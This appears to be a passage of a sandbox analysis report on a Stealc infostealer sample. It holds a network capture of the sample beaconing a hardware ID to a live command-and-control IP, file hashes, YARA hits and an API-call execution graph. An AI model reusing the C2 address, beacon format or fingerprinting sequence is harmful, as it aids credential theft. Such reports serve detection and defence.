                        Nov 20, 2024 03:20:37.141319990 CET | 90 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 20, 2024 03:20:37.857381105 CET | 203 | IN | HTTP/1.1 200 OK
                        Date: Wed, 20 Nov 2024 02:20:37 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 20, 2024 03:20:37.859996080 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a
                        Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
                        Nov 20, 2024 03:20:38.086021900 CET | 210 | IN | HTTP/1.1 200 OK
                        Date: Wed, 20 Nov 2024 02:20:37 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Target ID:0
                        Start time:21:20:31
                        Start date:19/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x3a0000
                        File size:1'801'728 bytes
                        MD5 hash:AF00FAE5BF606001C0C6EF0B98FB54D0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                          Execution Graph

                          Execution Coverage:5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.6%
                          Total number of Nodes:1404
                          Total number of Limit Nodes:28
                          [Execution graph: rendered as an image in the report; the node/edge dump is not reproduced. Recoverable information follows.]
                          Root node of the main path: 3c1bf0. Functions and API calls reached along it, in graph order:
                          • 3a2a90 -> 3a4a60 (called repeatedly): RtlAllocateHeap, VirtualProtect
                          • 3c6390: GetPEB, LoadLibraryA (x5), GetProcAddress (several)
                          • 3c1c29 / 3c1c6d: lstrcpy, GetSystemInfo, ExitProcess
                          • 3a1030: GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx, GetUserDefaultLangID, ExitProcess
                          • 3c2ad0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA
                          • 3c2a40: GetProcessHeap, RtlAllocateHeap, GetUserNameA
                          • string assembly: lstrlen, lstrcpy, lstrcat
                          • 3c1e56 .. 3c1e8c: OpenEventA, CloseHandle, Sleep, OpenEventA, CreateEventA
                          • 3c1b20: GetSystemTime; 3c1b81: sscanf; 3a2a20: SystemTimeToFileTime (x2); 3c1ea5: CloseHandle, ExitProcess
                          • 3bffd0 onward: lstrcpy/lstrlen/lstrcat chains, 3c2740: GetWindowsDirectoryA, 3b8ca0: StrCmpCA, 3b7ee0: lstrlen, lstrcpy, StrCmpCA (x3), 3b8050: lstrlen, lstrcpy, StrCmpCA, and further nodes summarised only by API-call counts (e.g. 3b7280: 1496 API calls, 3bd7b0: 103 API calls, setSBCS)
                          Other root nodes listed in the graph:
                          • 3c3130: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                          • 3c30a0: GetSystemPowerStatus
                          • 3c29a0: GetCurrentProcess, IsWow64Process
                          • 3c2c10: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA
                          • 3c9711: MultiByteToWideChar (x4), __setmbcp
                          • 3a100e: GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree
                          • 3c4480: OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy
27078->27079 27080 3a4a60 2 API calls 27079->27080 27081 3a3dfd 27080->27081 27082 3a4a60 2 API calls 27081->27082 27083 3a3e13 27082->27083 27084 3a4a60 2 API calls 27083->27084 27085 3a3e29 27084->27085 27086 3a4a60 2 API calls 27085->27086 27087 3a3e3f 27086->27087 27088 3a4a60 2 API calls 27087->27088 27089 3a3e55 27088->27089 27090 3a4a60 2 API calls 27089->27090 27091 3a3e6e 27090->27091 27092 3a4a60 2 API calls 27091->27092 27093 3a3e84 27092->27093 27094 3a4a60 2 API calls 27093->27094 27095 3a3e9a 27094->27095 27096 3a4a60 2 API calls 27095->27096 27097 3a3eb0 27096->27097 27098 3a4a60 2 API calls 27097->27098 27099 3a3ec6 27098->27099 27100 3a4a60 2 API calls 27099->27100 27101 3a3edc 27100->27101 27102 3a4a60 2 API calls 27101->27102 27103 3a3ef5 27102->27103 27104 3a4a60 2 API calls 27103->27104 27105 3a3f0b 27104->27105 27106 3a4a60 2 API calls 27105->27106 27107 3a3f21 27106->27107 27108 3a4a60 2 API calls 27107->27108 27109 3a3f37 27108->27109 27110 3a4a60 2 API calls 27109->27110 27111 3a3f4d 27110->27111 27112 3a4a60 2 API calls 27111->27112 27113 3a3f63 27112->27113 27114 3a4a60 2 API calls 27113->27114 27115 3a3f7c 27114->27115 27116 3a4a60 2 API calls 27115->27116 27117 3a3f92 27116->27117 27118 3a4a60 2 API calls 27117->27118 27119 3a3fa8 27118->27119 27120 3a4a60 2 API calls 27119->27120 27121 3a3fbe 27120->27121 27122 3a4a60 2 API calls 27121->27122 27123 3a3fd4 27122->27123 27124 3a4a60 2 API calls 27123->27124 27125 3a3fea 27124->27125 27126 3a4a60 2 API calls 27125->27126 27127 3a4003 27126->27127 27128 3a4a60 2 API calls 27127->27128 27129 3a4019 27128->27129 27130 3a4a60 2 API calls 27129->27130 27131 3a402f 27130->27131 27132 3a4a60 2 API calls 27131->27132 27133 3a4045 27132->27133 27134 3a4a60 2 API calls 27133->27134 27135 3a405b 27134->27135 27136 3a4a60 2 API calls 27135->27136 27137 3a4071 27136->27137 27138 3a4a60 2 API calls 27137->27138 27139 3a408a 27138->27139 27140 3a4a60 2 API calls 27139->27140 27141 3a40a0 27140->27141 
27142 3a4a60 2 API calls 27141->27142 27143 3a40b6 27142->27143 27144 3a4a60 2 API calls 27143->27144 27145 3a40cc 27144->27145 27146 3a4a60 2 API calls 27145->27146 27147 3a40e2 27146->27147 27148 3a4a60 2 API calls 27147->27148 27149 3a40f8 27148->27149 27150 3a4a60 2 API calls 27149->27150 27151 3a4111 27150->27151 27152 3a4a60 2 API calls 27151->27152 27153 3a4127 27152->27153 27154 3a4a60 2 API calls 27153->27154 27155 3a413d 27154->27155 27156 3a4a60 2 API calls 27155->27156 27157 3a4153 27156->27157 27158 3a4a60 2 API calls 27157->27158 27159 3a4169 27158->27159 27160 3a4a60 2 API calls 27159->27160 27161 3a417f 27160->27161 27162 3a4a60 2 API calls 27161->27162 27163 3a4198 27162->27163 27164 3a4a60 2 API calls 27163->27164 27165 3a41ae 27164->27165 27166 3a4a60 2 API calls 27165->27166 27167 3a41c4 27166->27167 27168 3a4a60 2 API calls 27167->27168 27169 3a41da 27168->27169 27170 3a4a60 2 API calls 27169->27170 27171 3a41f0 27170->27171 27172 3a4a60 2 API calls 27171->27172 27173 3a4206 27172->27173 27174 3a4a60 2 API calls 27173->27174 27175 3a421f 27174->27175 27176 3a4a60 2 API calls 27175->27176 27177 3a4235 27176->27177 27178 3a4a60 2 API calls 27177->27178 27179 3a424b 27178->27179 27180 3a4a60 2 API calls 27179->27180 27181 3a4261 27180->27181 27182 3a4a60 2 API calls 27181->27182 27183 3a4277 27182->27183 27184 3a4a60 2 API calls 27183->27184 27185 3a428d 27184->27185 27186 3a4a60 2 API calls 27185->27186 27187 3a42a6 27186->27187 27188 3a4a60 2 API calls 27187->27188 27189 3a42bc 27188->27189 27190 3a4a60 2 API calls 27189->27190 27191 3a42d2 27190->27191 27192 3a4a60 2 API calls 27191->27192 27193 3a42e8 27192->27193 27194 3a4a60 2 API calls 27193->27194 27195 3a42fe 27194->27195 27196 3a4a60 2 API calls 27195->27196 27197 3a4314 27196->27197 27198 3a4a60 2 API calls 27197->27198 27199 3a432d 27198->27199 27200 3a4a60 2 API calls 27199->27200 27201 3a4343 27200->27201 27202 3a4a60 2 API calls 27201->27202 27203 3a4359 27202->27203 27204 3a4a60 2 
API calls 27203->27204 27205 3a436f 27204->27205 27206 3a4a60 2 API calls 27205->27206 27207 3a4385 27206->27207 27208 3a4a60 2 API calls 27207->27208 27209 3a439b 27208->27209 27210 3a4a60 2 API calls 27209->27210 27211 3a43b4 27210->27211 27212 3a4a60 2 API calls 27211->27212 27213 3a43ca 27212->27213 27214 3a4a60 2 API calls 27213->27214 27215 3a43e0 27214->27215 27216 3a4a60 2 API calls 27215->27216 27217 3a43f6 27216->27217 27218 3a4a60 2 API calls 27217->27218 27219 3a440c 27218->27219 27220 3a4a60 2 API calls 27219->27220 27221 3a4422 27220->27221 27222 3a4a60 2 API calls 27221->27222 27223 3a443b 27222->27223 27224 3a4a60 2 API calls 27223->27224 27225 3a4451 27224->27225 27226 3a4a60 2 API calls 27225->27226 27227 3a4467 27226->27227 27228 3a4a60 2 API calls 27227->27228 27229 3a447d 27228->27229 27230 3a4a60 2 API calls 27229->27230 27231 3a4493 27230->27231 27232 3a4a60 2 API calls 27231->27232 27233 3a44a9 27232->27233 27234 3a4a60 2 API calls 27233->27234 27235 3a44c2 27234->27235 27236 3a4a60 2 API calls 27235->27236 27237 3a44d8 27236->27237 27238 3a4a60 2 API calls 27237->27238 27239 3a44ee 27238->27239 27240 3a4a60 2 API calls 27239->27240 27241 3a4504 27240->27241 27242 3a4a60 2 API calls 27241->27242 27243 3a451a 27242->27243 27244 3a4a60 2 API calls 27243->27244 27245 3a4530 27244->27245 27246 3a4a60 2 API calls 27245->27246 27247 3a4549 27246->27247 27248 3a4a60 2 API calls 27247->27248 27249 3a455f 27248->27249 27250 3a4a60 2 API calls 27249->27250 27251 3a4575 27250->27251 27252 3a4a60 2 API calls 27251->27252 27253 3a458b 27252->27253 27254 3a4a60 2 API calls 27253->27254 27255 3a45a1 27254->27255 27256 3a4a60 2 API calls 27255->27256 27257 3a45b7 27256->27257 27258 3a4a60 2 API calls 27257->27258 27259 3a45d0 27258->27259 27260 3a4a60 2 API calls 27259->27260 27261 3a45e6 27260->27261 27262 3a4a60 2 API calls 27261->27262 27263 3a45fc 27262->27263 27264 3a4a60 2 API calls 27263->27264 27265 3a4612 27264->27265 27266 3a4a60 2 API calls 
27265->27266 27267 3a4628 27266->27267 27268 3a4a60 2 API calls 27267->27268 27269 3a463e 27268->27269 27270 3a4a60 2 API calls 27269->27270 27271 3a4657 27270->27271 27272 3a4a60 2 API calls 27271->27272 27273 3a466d 27272->27273 27274 3a4a60 2 API calls 27273->27274 27275 3a4683 27274->27275 27276 3a4a60 2 API calls 27275->27276 27277 3a4699 27276->27277 27278 3a4a60 2 API calls 27277->27278 27279 3a46af 27278->27279 27280 3a4a60 2 API calls 27279->27280 27281 3a46c5 27280->27281 27282 3a4a60 2 API calls 27281->27282 27283 3a46de 27282->27283 27284 3a4a60 2 API calls 27283->27284 27285 3a46f4 27284->27285 27286 3a4a60 2 API calls 27285->27286 27287 3a470a 27286->27287 27288 3a4a60 2 API calls 27287->27288 27289 3a4720 27288->27289 27290 3a4a60 2 API calls 27289->27290 27291 3a4736 27290->27291 27292 3a4a60 2 API calls 27291->27292 27293 3a474c 27292->27293 27294 3a4a60 2 API calls 27293->27294 27295 3a4765 27294->27295 27296 3a4a60 2 API calls 27295->27296 27297 3a477b 27296->27297 27298 3a4a60 2 API calls 27297->27298 27299 3a4791 27298->27299 27300 3a4a60 2 API calls 27299->27300 27301 3a47a7 27300->27301 27302 3a4a60 2 API calls 27301->27302 27303 3a47bd 27302->27303 27304 3a4a60 2 API calls 27303->27304 27305 3a47d3 27304->27305 27306 3a4a60 2 API calls 27305->27306 27307 3a47ec 27306->27307 27308 3a4a60 2 API calls 27307->27308 27309 3a4802 27308->27309 27310 3a4a60 2 API calls 27309->27310 27311 3a4818 27310->27311 27312 3a4a60 2 API calls 27311->27312 27313 3a482e 27312->27313 27314 3a4a60 2 API calls 27313->27314 27315 3a4844 27314->27315 27316 3a4a60 2 API calls 27315->27316 27317 3a485a 27316->27317 27318 3a4a60 2 API calls 27317->27318 27319 3a4873 27318->27319 27320 3a4a60 2 API calls 27319->27320 27321 3a4889 27320->27321 27322 3a4a60 2 API calls 27321->27322 27323 3a489f 27322->27323 27324 3a4a60 2 API calls 27323->27324 27325 3a48b5 27324->27325 27326 3a4a60 2 API calls 27325->27326 27327 3a48cb 27326->27327 27328 3a4a60 2 API calls 27327->27328 
27329 3a48e1 27328->27329 27330 3a4a60 2 API calls 27329->27330 27331 3a48fa 27330->27331 27332 3a4a60 2 API calls 27331->27332 27333 3a4910 27332->27333 27334 3a4a60 2 API calls 27333->27334 27335 3a4926 27334->27335 27336 3a4a60 2 API calls 27335->27336 27337 3a493c 27336->27337 27338 3a4a60 2 API calls 27337->27338 27339 3a4952 27338->27339 27340 3a4a60 2 API calls 27339->27340 27341 3a4968 27340->27341 27342 3a4a60 2 API calls 27341->27342 27343 3a4981 27342->27343 27344 3a4a60 2 API calls 27343->27344 27345 3a4997 27344->27345 27346 3a4a60 2 API calls 27345->27346 27347 3a49ad 27346->27347 27348 3a4a60 2 API calls 27347->27348 27349 3a49c3 27348->27349 27350 3a4a60 2 API calls 27349->27350 27351 3a49d9 27350->27351 27352 3a4a60 2 API calls 27351->27352 27353 3a49ef 27352->27353 27354 3a4a60 2 API calls 27353->27354 27355 3a4a08 27354->27355 27356 3a4a60 2 API calls 27355->27356 27357 3a4a1e 27356->27357 27358 3a4a60 2 API calls 27357->27358 27359 3a4a34 27358->27359 27360 3a4a60 2 API calls 27359->27360 27361 3a4a4a 27360->27361 27362 3c66e0 27361->27362 27363 3c66ed 43 API calls 27362->27363 27364 3c6afe 8 API calls 27362->27364 27363->27364 27365 3c6c08 27364->27365 27366 3c6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27364->27366 27367 3c6c15 8 API calls 27365->27367 27368 3c6cd2 27365->27368 27366->27365 27367->27368 27369 3c6d4f 27368->27369 27370 3c6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27368->27370 27371 3c6d5c 6 API calls 27369->27371 27372 3c6de9 27369->27372 27370->27369 27371->27372 27373 3c6df6 12 API calls 27372->27373 27374 3c6f10 27372->27374 27373->27374 27375 3c6f8d 27374->27375 27376 3c6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27374->27376 27377 3c6f96 GetProcAddress GetProcAddress 27375->27377 27378 3c6fc1 27375->27378 27376->27375 27377->27378 27379 3c6fca GetProcAddress GetProcAddress 27378->27379 27380 3c6ff5 27378->27380 
27379->27380 27381 3c70ed 27380->27381 27382 3c7002 10 API calls 27380->27382 27383 3c70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27381->27383 27384 3c7152 27381->27384 27382->27381 27383->27384 27385 3c716e 27384->27385 27386 3c715b GetProcAddress 27384->27386 27387 3c7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27385->27387 27388 3c051f 27385->27388 27386->27385 27387->27388 27389 3a1530 27388->27389 27698 3a1610 27389->27698 27391 3a153b 27392 3a1555 lstrcpy 27391->27392 27393 3a155d 27391->27393 27392->27393 27394 3a1577 lstrcpy 27393->27394 27395 3a157f 27393->27395 27394->27395 27396 3a1599 lstrcpy 27395->27396 27397 3a15a1 27395->27397 27396->27397 27398 3a1605 27397->27398 27399 3a15fd lstrcpy 27397->27399 27400 3bf1b0 lstrlen 27398->27400 27399->27398 27401 3bf1e4 27400->27401 27402 3bf1eb lstrcpy 27401->27402 27403 3bf1f7 lstrlen 27401->27403 27402->27403 27404 3bf208 27403->27404 27405 3bf21b lstrlen 27404->27405 27406 3bf20f lstrcpy 27404->27406 27407 3bf22c 27405->27407 27406->27405 27408 3bf233 lstrcpy 27407->27408 27409 3bf23f 27407->27409 27408->27409 27410 3bf258 lstrcpy 27409->27410 27411 3bf264 27409->27411 27410->27411 27412 3bf286 lstrcpy 27411->27412 27413 3bf292 27411->27413 27412->27413 27414 3bf2ba lstrcpy 27413->27414 27415 3bf2c6 27413->27415 27414->27415 27416 3bf2ea lstrcpy 27415->27416 27477 3bf300 27415->27477 27416->27477 27417 3bf30c lstrlen 27417->27477 27418 3bf4b9 lstrcpy 27418->27477 27419 3bf3a1 lstrcpy 27419->27477 27420 3bf3c5 lstrcpy 27420->27477 27421 3bf4e8 lstrcpy 27481 3bf4f0 27421->27481 27422 3bf479 lstrcpy 27422->27477 27423 3bf59c lstrcpy 27423->27481 27424 3bf70f StrCmpCA 27429 3bfe8e 27424->27429 27424->27477 27425 3bf616 StrCmpCA 27425->27424 27425->27481 27426 3bfa29 StrCmpCA 27437 3bfe2b 27426->27437 27426->27477 27427 3bf73e lstrlen 27427->27477 27428 3bfead lstrlen 27440 3bfec7 27428->27440 27429->27428 27435 3bfea5 lstrcpy 27429->27435 27430 3bfd4d StrCmpCA 27431 
3bfd60 Sleep 27430->27431 27442 3bfd75 27430->27442 27431->27477 27432 3bfa58 lstrlen 27432->27477 27433 3bf64a lstrcpy 27433->27481 27434 3a1530 8 API calls 27434->27481 27435->27428 27436 3bfe4a lstrlen 27450 3bfe64 27436->27450 27437->27436 27438 3bfe42 lstrcpy 27437->27438 27438->27436 27439 3bf89e lstrcpy 27439->27477 27441 3bfee7 lstrlen 27440->27441 27445 3bfedf lstrcpy 27440->27445 27448 3bff01 27441->27448 27443 3bfd94 lstrlen 27442->27443 27446 3bfd8c lstrcpy 27442->27446 27452 3bfdae 27443->27452 27444 3bf76f lstrcpy 27444->27477 27445->27441 27446->27443 27447 3bfbb8 lstrcpy 27447->27477 27458 3bff21 27448->27458 27460 3bff19 lstrcpy 27448->27460 27449 3bfa89 lstrcpy 27449->27477 27451 3bfdce lstrlen 27450->27451 27453 3bfe7c lstrcpy 27450->27453 27459 3bfde8 27451->27459 27452->27451 27464 3bfdc6 lstrcpy 27452->27464 27453->27451 27454 3bf791 lstrcpy 27454->27477 27456 3a1530 8 API calls 27456->27477 27457 3bf8cd lstrcpy 27457->27481 27461 3a1610 4 API calls 27458->27461 27466 3bfe08 27459->27466 27469 3bfe00 lstrcpy 27459->27469 27460->27458 27484 3bfe13 27461->27484 27462 3bfaab lstrcpy 27462->27477 27463 3bf698 lstrcpy 27463->27481 27464->27451 27465 3bfbe7 lstrcpy 27465->27481 27470 3a1610 4 API calls 27466->27470 27467 3bee90 28 API calls 27467->27477 27468 3befb0 35 API calls 27468->27481 27469->27466 27470->27484 27471 3bf7e2 lstrcpy 27471->27477 27472 3bf924 lstrcpy 27472->27481 27473 3bf99e StrCmpCA 27473->27426 27473->27481 27474 3bfafc lstrcpy 27474->27477 27475 3bfc3e lstrcpy 27475->27481 27476 3bfcb8 StrCmpCA 27476->27430 27476->27481 27477->27417 27477->27418 27477->27419 27477->27420 27477->27421 27477->27422 27477->27424 27477->27426 27477->27427 27477->27430 27477->27432 27477->27439 27477->27444 27477->27447 27477->27449 27477->27454 27477->27456 27477->27457 27477->27462 27477->27465 27477->27467 27477->27471 27477->27474 27477->27481 27478 3bf9cb lstrcpy 27478->27481 27479 3bfce9 lstrcpy 27479->27481 27480 3bee90 28 API calls 
27480->27481 27481->27423 27481->27425 27481->27426 27481->27430 27481->27433 27481->27434 27481->27463 27481->27468 27481->27472 27481->27473 27481->27475 27481->27476 27481->27477 27481->27478 27481->27479 27481->27480 27482 3bfa19 lstrcpy 27481->27482 27483 3bfd3a lstrcpy 27481->27483 27482->27481 27483->27481 27484->26508 27486 3c278c GetVolumeInformationA 27485->27486 27487 3c2785 27485->27487 27488 3c27ec GetProcessHeap RtlAllocateHeap 27486->27488 27487->27486 27490 3c2826 wsprintfA 27488->27490 27491 3c2822 27488->27491 27490->27491 27708 3c71e0 27491->27708 27495 3a4c70 27494->27495 27496 3a4c85 27495->27496 27497 3a4c7d lstrcpy 27495->27497 27712 3a4bc0 27496->27712 27497->27496 27499 3a4c90 27500 3a4ccc lstrcpy 27499->27500 27501 3a4cd8 27499->27501 27500->27501 27502 3a4cff lstrcpy 27501->27502 27503 3a4d0b 27501->27503 27502->27503 27504 3a4d2f lstrcpy 27503->27504 27505 3a4d3b 27503->27505 27504->27505 27506 3a4d6d lstrcpy 27505->27506 27507 3a4d79 27505->27507 27506->27507 27508 3a4dac InternetOpenA StrCmpCA 27507->27508 27509 3a4da0 lstrcpy 27507->27509 27510 3a4de0 27508->27510 27509->27508 27511 3a54b8 InternetCloseHandle CryptStringToBinaryA 27510->27511 27716 3c3e70 27510->27716 27512 3a54e8 LocalAlloc 27511->27512 27529 3a55d8 27511->27529 27514 3a54ff CryptStringToBinaryA 27512->27514 27512->27529 27515 3a5529 lstrlen 27514->27515 27516 3a5517 LocalFree 27514->27516 27517 3a553d 27515->27517 27516->27529 27519 3a5563 lstrlen 27517->27519 27520 3a5557 lstrcpy 27517->27520 27518 3a4dfa 27521 3a4e23 lstrcpy lstrcat 27518->27521 27522 3a4e38 27518->27522 27524 3a557d 27519->27524 27520->27519 27521->27522 27523 3a4e5a lstrcpy 27522->27523 27526 3a4e62 27522->27526 27523->27526 27525 3a558f lstrcpy lstrcat 27524->27525 27527 3a55a2 27524->27527 27525->27527 27528 3a4e71 lstrlen 27526->27528 27531 3a55d1 27527->27531 27532 3a55c9 lstrcpy 27527->27532 27530 3a4e89 27528->27530 27529->26537 27533 3a4e95 lstrcpy lstrcat 27530->27533 27534 3a4eac 
27530->27534 27531->27529 27532->27531 27533->27534 27535 3a4ed5 27534->27535 27536 3a4ecd lstrcpy 27534->27536 27537 3a4edc lstrlen 27535->27537 27536->27535 27538 3a4ef2 27537->27538 27539 3a4efe lstrcpy lstrcat 27538->27539 27540 3a4f15 27538->27540 27539->27540 27541 3a4f36 lstrcpy 27540->27541 27542 3a4f3e 27540->27542 27541->27542 27543 3a4f65 lstrcpy lstrcat 27542->27543 27544 3a4f7b 27542->27544 27543->27544 27545 3a4fa4 27544->27545 27546 3a4f9c lstrcpy 27544->27546 27547 3a4fab lstrlen 27545->27547 27546->27545 27548 3a4fc1 27547->27548 27549 3a4fcd lstrcpy lstrcat 27548->27549 27550 3a4fe4 27548->27550 27549->27550 27551 3a500d 27550->27551 27552 3a5005 lstrcpy 27550->27552 27553 3a5014 lstrlen 27551->27553 27552->27551 27554 3a502a 27553->27554 27555 3a5036 lstrcpy lstrcat 27554->27555 27556 3a504d 27554->27556 27555->27556 27557 3a5079 27556->27557 27558 3a5071 lstrcpy 27556->27558 27559 3a5080 lstrlen 27557->27559 27558->27557 27560 3a509b 27559->27560 27561 3a50ac lstrcpy lstrcat 27560->27561 27562 3a50bc 27560->27562 27561->27562 27563 3a50da lstrcpy lstrcat 27562->27563 27564 3a50ed 27562->27564 27563->27564 27565 3a510b lstrcpy 27564->27565 27566 3a5113 27564->27566 27565->27566 27567 3a5121 InternetConnectA 27566->27567 27567->27511 27568 3a5150 HttpOpenRequestA 27567->27568 27569 3a518b 27568->27569 27570 3a54b1 InternetCloseHandle 27568->27570 27723 3c7310 lstrlen 27569->27723 27570->27511 27574 3a51a4 27731 3c72c0 27574->27731 27577 3c7280 lstrcpy 27578 3a51c0 27577->27578 27579 3c7310 3 API calls 27578->27579 27580 3a51d5 27579->27580 27581 3c7280 lstrcpy 27580->27581 27582 3a51de 27581->27582 27583 3c7310 3 API calls 27582->27583 27584 3a51f4 27583->27584 27585 3c7280 lstrcpy 27584->27585 27586 3a51fd 27585->27586 27587 3c7310 3 API calls 27586->27587 27588 3a5213 27587->27588 27589 3c7280 lstrcpy 27588->27589 27590 3a521c 27589->27590 27591 3c7310 3 API calls 27590->27591 27592 3a5231 27591->27592 27593 3c7280 lstrcpy 27592->27593 27594 
3a523a 27593->27594 27595 3c72c0 2 API calls 27594->27595 27596 3a524d 27595->27596 27597 3c7280 lstrcpy 27596->27597 27598 3a5256 27597->27598 27599 3c7310 3 API calls 27598->27599 27600 3a526b 27599->27600 27601 3c7280 lstrcpy 27600->27601 27602 3a5274 27601->27602 27603 3c7310 3 API calls 27602->27603 27604 3a5289 27603->27604 27605 3c7280 lstrcpy 27604->27605 27606 3a5292 27605->27606 27607 3c72c0 2 API calls 27606->27607 27608 3a52a5 27607->27608 27609 3c7280 lstrcpy 27608->27609 27610 3a52ae 27609->27610 27611 3c7310 3 API calls 27610->27611 27612 3a52c3 27611->27612 27613 3c7280 lstrcpy 27612->27613 27614 3a52cc 27613->27614 27615 3c7310 3 API calls 27614->27615 27616 3a52e2 27615->27616 27617 3c7280 lstrcpy 27616->27617 27618 3a52eb 27617->27618 27619 3c7310 3 API calls 27618->27619 27620 3a5301 27619->27620 27621 3c7280 lstrcpy 27620->27621 27622 3a530a 27621->27622 27623 3c7310 3 API calls 27622->27623 27624 3a531f 27623->27624 27625 3c7280 lstrcpy 27624->27625 27626 3a5328 27625->27626 27627 3c72c0 2 API calls 27626->27627 27628 3a533b 27627->27628 27629 3c7280 lstrcpy 27628->27629 27630 3a5344 27629->27630 27631 3a537c 27630->27631 27632 3a5370 lstrcpy 27630->27632 27633 3c72c0 2 API calls 27631->27633 27632->27631 27634 3a538a 27633->27634 27635 3c72c0 2 API calls 27634->27635 27636 3a5397 27635->27636 27637 3c7280 lstrcpy 27636->27637 27638 3a53a1 27637->27638 27639 3a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27638->27639 27640 3a549c InternetCloseHandle 27639->27640 27644 3a53f2 27639->27644 27642 3a54ae 27640->27642 27641 3a53fd lstrlen 27641->27644 27642->27570 27643 3a542e lstrcpy lstrcat 27643->27644 27644->27640 27644->27641 27644->27643 27645 3a5473 27644->27645 27646 3a546b lstrcpy 27644->27646 27647 3a547a InternetReadFile 27645->27647 27646->27645 27647->27640 27647->27644 27649 3b8ccd 27648->27649 27650 3b8cc6 ExitProcess 27648->27650 27651 3b8ee2 27649->27651 27652 3b8d5a lstrlen 27649->27652 27653 3b8dbd StrCmpCA 27649->27653 
27654 3b8ddd StrCmpCA 27649->27654 27655 3b8dfd StrCmpCA 27649->27655 27656 3b8e1d StrCmpCA 27649->27656 27657 3b8e3d StrCmpCA 27649->27657 27658 3b8d30 lstrlen 27649->27658 27659 3b8e56 StrCmpCA 27649->27659 27660 3b8e88 lstrlen 27649->27660 27661 3b8e6f StrCmpCA 27649->27661 27662 3b8d06 lstrlen 27649->27662 27663 3b8d84 StrCmpCA 27649->27663 27664 3b8da4 StrCmpCA 27649->27664 27665 3b8ebb lstrcpy 27649->27665 27651->26539 27652->27649 27653->27649 27654->27649 27655->27649 27656->27649 27657->27649 27658->27649 27659->27649 27660->27649 27661->27649 27662->27649 27663->27649 27664->27649 27665->27649 27666->26545 27667->26547 27668->26553 27669->26555 27670->26561 27671->26563 27672->26569 27673->26573 27674->26579 27675->26581 27676->26585 27677->26599 27678->26603 27679->26602 27680->26598 27681->26602 27682->26618 27683->26604 27684->26608 27685->26609 27686->26615 27687->26620 27688->26622 27689->26629 27690->26635 27691->26657 27692->26660 27693->26659 27694->26655 27695->26659 27696->26669 27699 3a161f 27698->27699 27700 3a162b lstrcpy 27699->27700 27701 3a1633 27699->27701 27700->27701 27702 3a164d lstrcpy 27701->27702 27703 3a1655 27701->27703 27702->27703 27704 3a166f lstrcpy 27703->27704 27705 3a1677 27703->27705 27704->27705 27706 3a1699 27705->27706 27707 3a1691 lstrcpy 27705->27707 27706->27391 27707->27706 27709 3c71e6 27708->27709 27710 3c71fc lstrcpy 27709->27710 27711 3c2860 27709->27711 27710->27711 27711->26534 27713 3a4bd0 27712->27713 27713->27713 27714 3a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27713->27714 27715 3a4c41 27714->27715 27715->27499 27717 3c3e83 27716->27717 27718 3c3e9f lstrcpy 27717->27718 27719 3c3eab 